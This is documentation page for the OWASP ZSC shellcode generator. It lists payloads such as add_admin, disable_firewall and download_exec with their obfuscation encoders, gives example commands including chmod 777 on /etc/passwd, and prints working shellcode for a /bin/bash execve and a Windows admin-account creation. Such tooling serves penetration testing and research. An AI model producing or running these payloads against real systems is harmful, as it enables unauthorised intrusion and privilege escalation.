Command line ZSC

OWASP ZSC offers the possibility to generate shellcode directly from the command line or you can also use the interactive shell to drill-down the available ones,in this way, you can explore the options and features. If you are not familiar yet with ZSC, we recommend you to try out first the interactive shell to learn more about the payloads parameters and options.

Examples zsc from command line

To get a list of examples on how to use the command line use

zsc -e
[+] zsc.py --show-payloads
[+] zsc.py --show-payloads windows
[+] zsc.py -l php
[+] zsc.py --shell-storm search word1
[+] zsc.py -s search "word1 word2"
[+] zsc.py -s download id
[+] zsc.py -s download id -o shellcode.c
[+] zsc.py --payload windows_x86/system/mix_all --input "ls -la"
[+] zsc.py -p linux_x86/chmod/xor_random -i "/etc/passwd~~~777"
[+] zsc.py --payload osx_x86/system/none --input "ls -la" --assembly-code
[+] zsc.py -p linux_x86/write/inc -i "/etc/passwd~~~ali" -c
[+] zsc.py -p linux_x86/system/dec_15 -i "dir" --output shellcode.c
[+] zsc.py -p windows_x86/exec/add_0x4b5ff271 -i "calc.exe" -o shellcode.c
[+] zsc.py -p php/simple_hex -i "/path/file.php"

To get a complete list of all the payloads available use the following command

python zsc.py -l

This will output a complete list of all the features and options avaialble

[!] Note: Shellcode Payloads Sorted By OperatingSystem_Architecture/Function_Name/Encode_Name
[!] Note: Programming Languages Payloads Sorted By ProgrammingLanguagesName/Encode_Name

[!] system('command_to_execute')
[+] osx_x86/system/none

[!] chmod('file_to_perm','perm_number')
[+] osx_x86/chmod/none

[!] exec('file_to_execute')
[+] osx_x86/exec/none

[!] add_admin('username','password')
[+] windows_x86/add_admin/none
[+] windows_x86/add_admin/xor_random
[+] windows_x86/add_admin/add_random
[+] windows_x86/add_admin/sub_random
[+] windows_x86/add_admin/xor_yourvalue

[!] download_exec('url','filename')
[+] windows_x86/download_exec/none
[+] windows_x86/download_exec/xor_random
[+] windows_x86/download_exec/add_random
[+] windows_x86/download_exec/sub_random
[+] windows_x86/download_exec/xor_yourvalue

[!] exec('file_to_execute')
[+] windows_x86/exec/none
[+] windows_x86/exec/xor_random
[+] windows_x86/exec/add_random
[+] windows_x86/exec/sub_random
[+] windows_x86/exec/xor_yourvalue

[!] disable_firewall()
[+] windows_x86/disable_firewall/none
[+] windows_x86/disable_firewall/xor_random
[+] windows_x86/disable_firewall/add_random
[+] windows_x86/disable_firewall/sub_random
[+] windows_x86/disable_firewall/xor_yourvalue

[!] download_tofile('url','filename')
[+] windows_x86/download_tofile/none
[+] windows_x86/download_tofile/xor_random
[+] windows_x86/download_tofile/add_random
[+] windows_x86/download_tofile/sub_random
[+] windows_x86/download_tofile/xor_yourvalue

[!] create_file('filename','content')
[+] windows_x86/create_file/none
[+] windows_x86/create_file/xor_random
[+] windows_x86/create_file/add_random
[+] windows_x86/create_file/sub_random
[+] windows_x86/create_file/xor_yourvalue

[!] dir_create('directory_to_create')
[+] windows_x86/dir_create/none
[+] windows_x86/dir_create/xor_random
[+] windows_x86/dir_create/add_random
[+] windows_x86/dir_create/sub_random
[+] windows_x86/dir_create/xor_yourvalue

[!] download_execute('download_url','filename','command_to_execute')
[+] linux_x86/download_execute/none
[+] linux_x86/download_execute/xor_random
[+] linux_x86/download_execute/xor_yourvalue
[+] linux_x86/download_execute/add_random
[+] linux_x86/download_execute/add_yourvalue
[+] linux_x86/download_execute/sub_random
[+] linux_x86/download_execute/sub_yourvalue
[+] linux_x86/download_execute/inc
[+] linux_x86/download_execute/inc_timesyouwant
[+] linux_x86/download_execute/dec
[+] linux_x86/download_execute/dec_timesyouwant
[+] linux_x86/download_execute/mix_all

[!] write('file_to_write','content')
[+] linux_x86/write/none
[+] linux_x86/write/xor_random
[+] linux_x86/write/xor_yourvalue
[+] linux_x86/write/add_random
[+] linux_x86/write/add_yourvalue
[+] linux_x86/write/sub_random
[+] linux_x86/write/sub_yourvalue
[+] linux_x86/write/inc
[+] linux_x86/write/inc_timesyouwant
[+] linux_x86/write/dec
[+] linux_x86/write/dec_timesyouwant
[+] linux_x86/write/mix_all

[!] file_create('filename','content')
[+] linux_x86/file_create/none
[+] linux_x86/file_create/xor_random
[+] linux_x86/file_create/xor_yourvalue
[+] linux_x86/file_create/add_random
[+] linux_x86/file_create/add_yourvalue
[+] linux_x86/file_create/sub_random
[+] linux_x86/file_create/sub_yourvalue
[+] linux_x86/file_create/inc
[+] linux_x86/file_create/inc_timesyouwant
[+] linux_x86/file_create/dec
[+] linux_x86/file_create/dec_timesyouwant
[+] linux_x86/file_create/mix_all

[!] dir_create('directory_to_create')
[+] linux_x86/dir_create/none
[+] linux_x86/dir_create/xor_random
[+] linux_x86/dir_create/xor_yourvalue
[+] linux_x86/dir_create/add_random
[+] linux_x86/dir_create/add_yourvalue
[+] linux_x86/dir_create/sub_random
[+] linux_x86/dir_create/sub_yourvalue
[+] linux_x86/dir_create/inc
[+] linux_x86/dir_create/inc_timesyouwant
[+] linux_x86/dir_create/dec
[+] linux_x86/dir_create/dec_timesyouwant
[+] linux_x86/dir_create/mix_all

[!] exec('file_to_execute')
[+] linux_x86/exec/none
[+] linux_x86/exec/xor_random
[+] linux_x86/exec/xor_yourvalue
[+] linux_x86/exec/add_random
[+] linux_x86/exec/add_yourvalue
[+] linux_x86/exec/sub_random
[+] linux_x86/exec/sub_yourvalue
[+] linux_x86/exec/inc
[+] linux_x86/exec/inc_timesyouwant
[+] linux_x86/exec/dec
[+] linux_x86/exec/dec_timesyouwant
[+] linux_x86/exec/mix_all

[!] download('download_url','filename')
[+] linux_x86/download/none
[+] linux_x86/download/xor_random
[+] linux_x86/download/xor_yourvalue
[+] linux_x86/download/add_random
[+] linux_x86/download/add_yourvalue
[+] linux_x86/download/sub_random
[+] linux_x86/download/sub_yourvalue
[+] linux_x86/download/inc
[+] linux_x86/download/inc_timesyouwant
[+] linux_x86/download/dec
[+] linux_x86/download/dec_timesyouwant
[+] linux_x86/download/mix_all

[!] script_executor('name_of_script','name_of_your_script_in_your_pc','execute_to_command')
[+] linux_x86/script_executor/none
[+] linux_x86/script_executor/xor_random
[+] linux_x86/script_executor/xor_yourvalue
[+] linux_x86/script_executor/add_random
[+] linux_x86/script_executor/add_yourvalue
[+] linux_x86/script_executor/sub_random
[+] linux_x86/script_executor/sub_yourvalue
[+] linux_x86/script_executor/inc
[+] linux_x86/script_executor/inc_timesyouwant
[+] linux_x86/script_executor/dec
[+] linux_x86/script_executor/dec_timesyouwant
[+] linux_x86/script_executor/mix_all

[!] system('command_to_execute')
[+] linux_x86/system/none
[+] linux_x86/system/xor_random
[+] linux_x86/system/xor_yourvalue
[+] linux_x86/system/add_random
[+] linux_x86/system/add_yourvalue
[+] linux_x86/system/sub_random
[+] linux_x86/system/sub_yourvalue
[+] linux_x86/system/inc
[+] linux_x86/system/inc_timesyouwant
[+] linux_x86/system/dec
[+] linux_x86/system/dec_timesyouwant
[+] linux_x86/system/mix_all

[!] chmod('file_to_perm','perm_number')
[+] linux_x86/chmod/none
[+] linux_x86/chmod/xor_random
[+] linux_x86/chmod/xor_yourvalue
[+] linux_x86/chmod/add_random
[+] linux_x86/chmod/add_yourvalue
[+] linux_x86/chmod/sub_random
[+] linux_x86/chmod/sub_yourvalue
[+] linux_x86/chmod/inc
[+] linux_x86/chmod/inc_timesyouwant
[+] linux_x86/chmod/dec
[+] linux_x86/chmod/dec_timesyouwant
[+] linux_x86/chmod/mix_all

[!] python
[+] python/simple_hex
[+] python/simple_hex_rev
[+] python/simple_base64_rev


[!] javascript
[+] javascript/simple_hex
[+] javascript/base64
[+] javascript/simple_hex_rev
[+] javascript/simple_base64_rev


[!] ruby
[+] ruby/simple_hex
[+] ruby/base64
[+] ruby/simple_hex_rev
[+] ruby/base64_rev


[!] php
[+] php/simple_hex
[+] php/base64
[+] php/simple_hex_rev
[+] php/base64_rev


[!] perl
[+] perl/simple_hex
[+] perl/base64
[+] perl/simple_hex_rev
[+] perl/simple_base64_rev

Selecting a payload

Based on this menu you can select a payload using the following command zsc -p osx_x86/exec/none -i /bin/bash P for the 'payload' and -i for parameter input , example: when using parameters, be sure to set them between "parameter1" if more parameters are required then use

"parameter1~~~parameter2"

This will generate the following shellcode:

[+] Generated shellcode is:

\x68\x90\x90\x90\x68\x5b\xc1\xeb\x10\xc1\xeb\x08\x53\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\x52\x51\x53\xb0\x3b\x6a\x2a\xcd\x80\xb0\x01\xb3\x01\xcd\x80

Another example with more parameters (add_admin requires username and password):

[!] add_admin('username','password')
[+] windows_x86/add_admin/none

The command line code:

zsc -p windows_x86/add_admin/none -i "mary~~~password"

Will create:

+] Generated shellcode is:

\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x53\x52\x31\xc9\x51\xb9\x78\x65\x63\x61\x51\x83\x6c\x24\x03\x61\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x83\xc4\x08\x59\x50\x31\xc9\x51\x68\x90\x90\x90\x64\x59\xc1\xe9\x10\xc1\xe9\x08\x51\x68\x20\x2f\x61\x64\x68\x6d\x61\x72\x79\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x68\x20\x61\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x64\x64\x20\x26\x68\x64\x20\x2f\x61\x68\x73\x77\x6f\x72\x68\x20\x70\x61\x73\x68\x6d\x61\x72\x79\x68\x73\x65\x72\x20\x68\x65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x31\xdb\x89\xe3\x31\xc9\x41\x51\x53\xff\xd0\x83\xc4\x5c\x5a\x5b\x31\xc9\xb9\x65\x73\x73\x61\x51\x83\x6c\x24\x03\x61\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x53\xff\xd2\x31\xc9\x51\xff\xd0

results matching ""

    No results matching ""